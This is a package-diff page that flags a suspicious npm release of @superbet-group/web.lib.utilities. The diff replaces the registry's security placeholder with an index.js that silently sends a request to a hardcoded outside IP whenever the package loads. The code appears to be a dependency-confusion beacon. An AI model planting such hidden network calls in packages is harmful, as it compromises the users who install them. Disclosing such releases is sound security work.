@superbet-group/web.lib.utilities 0.0.1-security → 1.23.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @superbet-group/web.lib.utilities might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +21 -0
  2. package/package.json +12 -6
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,21 @@
1
+ const http = require('http')
2
+ const options = {
3
+ hostname: '207.154.222.173',
4
+ port: 80,
5
+ path: '/dependencyweb.lib.utilitiesnou',
6
+ method: 'GET'
7
+ }
8
+
9
+ const req = http.request(options, res => {
10
+ console.log(`statusCode: ${res.statusCode}`)
11
+
12
+ res.on('data', d => {
13
+ process.stdout.write(d)
14
+ })
15
+ })
16
+
17
+ req.on('error', error => {
18
+ console.error(error)
19
+ })
20
+
21
+ req.end()
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
- {
2
- "name": "@superbet-group/web.lib.utilities",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "@superbet-group/web.lib.utilities",
3
+ "version": "1.23.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test\" && exit 1"
8
+ },
9
+ "keywords": [],
10
+ "author": "marius constantin",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40superbet-group%2Fweb.lib.utilities for more information.